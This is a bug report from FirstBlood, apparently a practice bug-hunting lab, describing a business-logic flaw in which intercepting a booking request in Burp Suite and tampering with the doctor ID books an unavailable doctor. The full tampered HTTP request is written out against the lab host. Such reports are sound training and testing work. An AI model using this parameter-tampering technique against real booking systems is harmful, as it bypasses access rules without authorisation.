FirstBlood-#1027 — Can make book appointment to unavailable doctor
This issue was discovered on FirstBlood v3
On 2022-12-08, properlay Level 7 reported:
Hello, I found a way to make book appointment to unavailable doctor.
When booking a appointment, burp suite intercept ON
Then fill all the require info and click
On the intercept request, add
POST /api/ba.php HTTP/1.1 Host: e00b0c1f0b0b-properlay.a.firstbloodhackers.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Anti-Csrf: 82070-4702-33892 Content-Length: 137 Origin: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com Referer: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com/book-appointment.php Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close fname=test&lname=test&address=test&city=test&phonenumber=123123&email=23123&dob=12/04/2022&a1=&a2=&a3=&message=&slot=3&drId=1
- Forward the request, you will see that you made a book appointment to Julie ( unavailable doctor for book appointment )
Can make book appointment to unavailable doctor.
FirstBlood ID: 67
Vulnerability Type: Application/Business Logic
It is possible to book an unavailable doctor
Creator & Administrator
Congratulations, you were the first to report this!